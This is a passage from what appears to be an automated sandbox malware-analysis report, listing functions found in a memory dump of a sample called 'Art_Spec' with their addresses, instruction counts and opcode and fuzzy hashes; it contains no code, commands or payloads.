                                                        Function 0145483A Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                        • Instruction ID: 37f572e869818369d4e9e10206776847ab9a76f0364b8816d86493c223c20122
                                                        • Opcode Fuzzy Hash: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                        • Instruction Fuzzy Hash: 35316976A4012DABCF61DF58DC85BDE7BB5AB98350F1400E5E908A7261DA30DE91CF90
                                                        Function 013DEB20 Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                        • Instruction ID: e7f5399f1b9ac150ffff4405e2276929f18979c332cfd1db38aa7cafeefbbb21
                                                        • Opcode Fuzzy Hash: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                        • Instruction Fuzzy Hash: 0231B772E04219AFDB21DFADCC40AAFBBB8EF44754F014436E516DB250D670AE018BA0
                                                        Function 014760B8 Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                        • Instruction ID: 9e3170075c0b9cf5a19ad8a3146acc911b387f4d0a9332fe67b9c794d40e9385
                                                        • Opcode Fuzzy Hash: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                        • Instruction Fuzzy Hash: E831E471700A02EBEB229F6DD840AAFBBBAEB54754F06406EE505DB361DA70DC018B90
                                                        Function 013B07AF Relevance: .1, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c2538a58510ec7e50772c22efaf032011fd95b025534a65a804f90f93429afe
                                                        • Instruction ID: 25ecad5ea7b89315524ee6d3e9cd4dcdd500ebd5d1dd67702a77372b01137ec7
                                                        • Opcode Fuzzy Hash: 4c2538a58510ec7e50772c22efaf032011fd95b025534a65a804f90f93429afe
                                                        • Instruction Fuzzy Hash: DE312432A04216DBC716DE6888C0AABBFB5EFD4258F014529FE15E7B20EB30DC0187E1
                                                        Function 013B8550 Relevance: .1, Instructions: 94COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f38633e412598917eed8f7116907cccb78f426435f31d4a4c48be7742b7587c2
                                                        • Instruction ID: f121b43ffb83d7844401b47ee0964afcfffea26c3b8d87b0d2e9f4a8be6036f8
                                                        • Opcode Fuzzy Hash: f38633e412598917eed8f7116907cccb78f426435f31d4a4c48be7742b7587c2
                                                        • Instruction Fuzzy Hash: C2316DB16053018FE720CF19C840B5BBBE9EB98704F154A6EEA84D7765E7B0E944CB91
                                                        Function 013EA6C7 Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction ID: cd01908a269374db6e794f9b575fc96911dcc8bba50e7ebd38b06cc1a99a725e
                                                        • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                        • Instruction Fuzzy Hash: FA312DB2B00B11AFD765CFADCD44B57BBF8BB08A54F04052DA59AC3790E670E900CB60
                                                        Function 0145EBD0 Relevance: .1, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c60d6f94826017bcca2be2d8cdc0a21800630aaad2e90329a4a9b079b079a9f5
                                                        • Instruction ID: 390a32cfb92616a11cdc1eb853084905dad693424e209b71f7844dc6303858f3
                                                        • Opcode Fuzzy Hash: c60d6f94826017bcca2be2d8cdc0a21800630aaad2e90329a4a9b079b079a9f5
                                                        • Instruction Fuzzy Hash: 0E319AB15053018FC712DF1AC54085AFBF1FF99618F4589AEE888AB322E731DE45CB92
                                                        Function 013D438F Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9de5be3463e86c2994d1bbc938289a3ef49795ddb47401bda7305b9d53a4380b
                                                        • Instruction ID: 4bc1f2c7254af6373c296f50ba42f3cb3f502cbbb44b7d787550c19c4924dc5d
                                                        • Opcode Fuzzy Hash: 9de5be3463e86c2994d1bbc938289a3ef49795ddb47401bda7305b9d53a4380b
                                                        • Instruction Fuzzy Hash: 4631E572B002059FDB20DFB8D981A6EBBF9EF94708F00852AD515E7A54D730ED81CB91
                                                        Function 013ACB7E Relevance: .1, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                        • Instruction ID: bbce46f4500688e097b30617525a140a80b93f1753c4c640a036fe126ef93c4d
                                                        • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                        • Instruction Fuzzy Hash: 99212632E4025BAADB11DBBA8800BEFBBB9EF14744F1580369E15E7390E270C90187E0
                                                        Function 013AC156 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee4ef613e177d791b5c6df4c79e7fd56d4b2dbd4c1dd245cf9cbd09607d48e00
                                                        • Instruction ID: e5c0682cddc2c17f4ff0c8c6471e9ad8f5e9800acf4f26a7aeefe8d7e9949588
                                                        • Opcode Fuzzy Hash: ee4ef613e177d791b5c6df4c79e7fd56d4b2dbd4c1dd245cf9cbd09607d48e00
                                                        • Instruction Fuzzy Hash: 9E312C719003018BD722AF9DCC41BBA7774EF51318F94817EDD499B392DE34998ACB90
                                                        Function 0146C3CD Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction ID: 985c7a4c619d28932009536de9aec48e0557baa35e65617367d12050300d7d0e
                                                        • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                        • Instruction Fuzzy Hash: 58213036600652B6CF15EB998C40ABBBBB8EF50758F40802FFAD5876A1E634D950C361
                                                        Function 013AE420 Relevance: .1, Instructions: 88COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98cf2b8d3c7ed155bd212e5154d0433a22f118b67e1cab665c331f18b7cab7fc
                                                        • Instruction ID: 36a6e2ab4c28393ebffa1183463bde254463ccfe049ab55ac3e585a089d0c540
                                                        • Opcode Fuzzy Hash: 98cf2b8d3c7ed155bd212e5154d0433a22f118b67e1cab665c331f18b7cab7fc
                                                        • Instruction Fuzzy Hash: 7C31C332A0152C9BDB31DF18DC81FEEB7BDEB15758F4101B5E645A7290E674AE808FA0
                                                        Function 013E4588 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                        • Instruction ID: 7ac9966356dbd5a04011791ef0fb7e1deeb6f8a7c37e1365dd4323e3b5732948
                                                        • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                        • Instruction Fuzzy Hash: F0216031A00719EBCF15CF58C984A8ABBF5FF48728F108469EE15DB281D675EA058F90
                                                        Function 013E44B0 Relevance: .1, Instructions: 87COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ce8038efdfb8f16282938beba1da4ec0cd92b138c52f47be74b8b8589eef2635
                                                        • Instruction ID: dfa9bfcef32424b29a016993e0d4f5c7fab0a8143b4d76ae7cd53edf4fde9cf4
                                                        • Opcode Fuzzy Hash: ce8038efdfb8f16282938beba1da4ec0cd92b138c52f47be74b8b8589eef2635
                                                        • Instruction Fuzzy Hash: 3B21BF72604765DBCB22CF18C984B6B77E8FB8C764F014529FD549B6C1D734E9008BA2
                                                        Function 013AE388 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction ID: ff34038ee11906bccbed973e0e7f7ea814c3a7197823b66c32b4e5345fe08459
                                                        • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                        • Instruction Fuzzy Hash: D0317831600609EFE721CFA9C984F6AB7B9EF85358F1045B9E5529B690E770EE02CB50
                                                        Function 0142E609 Relevance: .1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9459b50eec256c12abbf53ab8251c7e45f6e431b7b5bee6a659deaccf584cc96
                                                        • Instruction ID: 65c76672f007e5ec52a1971b5c4cdca515564c09f5bcb685791e4a4b6185efc1
                                                        • Opcode Fuzzy Hash: 9459b50eec256c12abbf53ab8251c7e45f6e431b7b5bee6a659deaccf584cc96
                                                        • Instruction Fuzzy Hash: 3D318275600215EFCB25CF1CC484DAE77B6FF84304B9A455AE809AB3A1E771E991CB90
                                                        Function 014306F1 Relevance: .1, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb2875b39ab41a2cb11487b1b5881689aa29abf207387a4ab53e3209713abb30
                                                        • Instruction ID: 559da122ac1b368141cf44b1998b82e960bb071d272202c02f21f300cbb4edc2
                                                        • Opcode Fuzzy Hash: bb2875b39ab41a2cb11487b1b5881689aa29abf207387a4ab53e3209713abb30
                                                        • Instruction Fuzzy Hash: 95218071900129ABCF15DF59C881ABFB7F4FF48744B51416AF941AB250D738AD42CBA0
                                                        Function 0143019F Relevance: .1, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b1241f421b723f7e5aef3859370989be57e3f9b62c4b2159b404ecdc93fa6cc
                                                        • Instruction ID: 064b010200b0e995f13bf83d328d493ff077b1af23547892dffcc616588ea0aa
                                                        • Opcode Fuzzy Hash: 0b1241f421b723f7e5aef3859370989be57e3f9b62c4b2159b404ecdc93fa6cc
                                                        • Instruction Fuzzy Hash: E821BA71600605AFDB15DB6CC840F6AB7A8FF88B44F14416AF904DB7A1D635ED00CBA8
                                                        Function 01430283 Relevance: .1, Instructions: 74COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9588cc4778babc9c3506c6ff02bb40bad2fd91cbff4acd8485f3523e7bd6c984
                                                        • Instruction ID: 9dcf8664cf781ee971f4752a6d296fc4e3cc178d9ad93c115d1588a26c9fb3a7
                                                        • Opcode Fuzzy Hash: 9588cc4778babc9c3506c6ff02bb40bad2fd91cbff4acd8485f3523e7bd6c984
                                                        • Instruction Fuzzy Hash: 7921D0729043469BD711EF6DC844B9BBBDCAFD5644F08465BBD80C7261D730D909C7A2
                                                        Function 013D2835 Relevance: .1, Instructions: 73COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc380b6a6d5856a10bbc05adf030fc233ae6aec91bd53a507914585df8c1e8b2
                                                        • Instruction ID: 2b1303f50f874ad6d7b26f7492f64470711894016819dfbb188ad067c3631f62
                                                        • Opcode Fuzzy Hash: dc380b6a6d5856a10bbc05adf030fc233ae6aec91bd53a507914585df8c1e8b2
                                                        • Instruction Fuzzy Hash: DF212C32605AC59BE322572C9C08B163F95AF41B78F280365FA209B7F2DB78DC028210
                                                        Function 013EA30B Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3887b96118671fcf25a45eb3dafa71c8685f854922821e42329c586ba707507b
                                                        • Instruction ID: 3941749885bc15d2ba21dca4a808cd015261ebd759b02161ad6f0eb7d28ca97b
                                                        • Opcode Fuzzy Hash: 3887b96118671fcf25a45eb3dafa71c8685f854922821e42329c586ba707507b
                                                        • Instruction Fuzzy Hash: DF219A352017119BCB25DF29C800B56B7E5AF18B08F25846DE509CBB61E371EC82CF94
                                                        Function 0146A49A Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac4afa6c8a165a17270b30d406c66f5f0cdfb27cb028b4ba218aa189028cbcb4
                                                        • Instruction ID: 1b230838ec536fd3d28fc184631e697cc887485d7bb590410981003ad21a782f
                                                        • Opcode Fuzzy Hash: ac4afa6c8a165a17270b30d406c66f5f0cdfb27cb028b4ba218aa189028cbcb4
                                                        • Instruction Fuzzy Hash: 1911E772380F11BBD32296599C41F6B769D9BD4B64F71006AB708EB2A0EB70DC018796
                                                        Function 01430946 Relevance: .1, Instructions: 70COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c209f11aa9fa57a6aa73d5257fd6a24e89138e93b7355d4c481809f6fc6b15a1
                                                        • Instruction ID: 6c7d3d215a32b341d2e934d2631e2a688d45467c0f0f8fe5cf2415d3f5554648
                                                        • Opcode Fuzzy Hash: c209f11aa9fa57a6aa73d5257fd6a24e89138e93b7355d4c481809f6fc6b15a1
                                                        • Instruction Fuzzy Hash: 4321E6B1E00209ABDB24DFAAD9809AEFBF8FF98610F11012FE505A7350D7709941CB50
                                                        Function 014480A8 Relevance: .1, Instructions: 69COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                        • Instruction ID: e1cede6c536f9661848e2557268e6bf2cd2e0201b348b284f1466a9941247df0
                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                        • Instruction Fuzzy Hash: D4218C72A0020AEFEF129F98CC40BAEBBB9EF98710F20441AF945A7261D734DD519B50
                                                        Function 013E0124 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction ID: e819b3cf22ac70db579ed8387aaa656ae5bbfe08d5aa84010ae7a8051e2e2a4d
                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction Fuzzy Hash: 2811E276600716EFD72A9B58CC85F9ABBB8EB80758F100029F6049F1C0D6B1ED44CB50
                                                        Function 013B8770 Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21d888b82643e1224618da4e3fb63636b639c3bc4794d511550dab64d8bfa847
                                                        • Instruction ID: 2de542c6e63df98cc2ec411998a2570a608af889c9f79b2f609f4fe020f34f15
                                                        • Opcode Fuzzy Hash: 21d888b82643e1224618da4e3fb63636b639c3bc4794d511550dab64d8bfa847
                                                        • Instruction Fuzzy Hash: 4A11B2317016159BDB11CF4DC4C1A9ABBEDAF5A71DB1940EDEF08DF604E6B2D9028790
                                                        Function 013EAAEE Relevance: .1, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                        • Instruction ID: b8c2a6cb03fba842b3d2c5207338cf6c96b250c7bd0b9b35a73d275372fcbc1e
                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                        • Instruction Fuzzy Hash: 0121AC72600726DFDF218F49C548A66BBE6EB94B18F11893DE94987B50C730EC00CB40
                                                        Function 013B80E9 Relevance: .1, Instructions: 66COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 592fb6933ec0ec0de1c6595d464d8ba42db88469a328848a514ab681e996ea9b
                                                        • Instruction ID: c7187b81ab00449559e73aaaad092c5fa42692781a61fd680cbb417b602fe872
                                                        • Opcode Fuzzy Hash: 592fb6933ec0ec0de1c6595d464d8ba42db88469a328848a514ab681e996ea9b
                                                        • Instruction Fuzzy Hash: 79219F31A01209DFCB14CF58C580AAEBBB9FB88318F2441ADD205A7710D771AD06CBD0
                                                        Function 013E674D Relevance: .1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 787c79ce010f6259dc90c8dbaa1a89f7fe8851cfe417cdfaafb6dd2863662f77
                                                        • Instruction ID: 8d334207622edb38a3b560f442765f1bc1d877b1a91b66645c2e5f64b4dc6ee0
                                                        • Opcode Fuzzy Hash: 787c79ce010f6259dc90c8dbaa1a89f7fe8851cfe417cdfaafb6dd2863662f77
                                                        • Instruction Fuzzy Hash: 18218EB5600B11EFD7208F68C841B66B7E8FF54654F44882DE5AAC7690DB71A840CB60
                                                        Function 01446870 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d7c2b35fd9f56a0509e4f642c113dd9de0807e206b31feeb8ab0cebca530c144
                                                        • Instruction ID: 6b30519dbf3cc5ef593e88f305e7d7b5a4514a883d7b33b473e7709ce938796f
                                                        • Opcode Fuzzy Hash: d7c2b35fd9f56a0509e4f642c113dd9de0807e206b31feeb8ab0cebca530c144
                                                        • Instruction Fuzzy Hash: BE11A376240614EFE722DB5DC940F9A77A8EF56B54F12802AF205DB271DAB0ED01C790
                                                        Function 013DE8C0 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6cf6347159b1d21c87ef856c8be5def37e72062fee51822ee2eef0d1eef6b985
                                                        • Instruction ID: 98b839bbc2b974880ac93a976defd25a23c1634ce11f16e16c306f26891666ed
                                                        • Opcode Fuzzy Hash: 6cf6347159b1d21c87ef856c8be5def37e72062fee51822ee2eef0d1eef6b985
                                                        • Instruction Fuzzy Hash: 64114C373001149BCF19CB29CC40A6B7756EBD5278B29453AD522CB390EA308C16C790
                                                        Function 013E66B0 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c79fe599ee42791cd445d11f5fab90e67515500ab7b236477699b49d34853d37
                                                        • Instruction ID: 9d5fc7fef431d0ceba639e5cbd69e626304400220b97c0c3efbf2374f01bd3c3
                                                        • Opcode Fuzzy Hash: c79fe599ee42791cd445d11f5fab90e67515500ab7b236477699b49d34853d37
                                                        • Instruction Fuzzy Hash: EE11CEB6A41325DFCB25CF5DC585A5ABFF8AFA4618F06807DE9059B390EA30DD00CB90
                                                        Function 0147A8E4 Relevance: .1, Instructions: 61COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
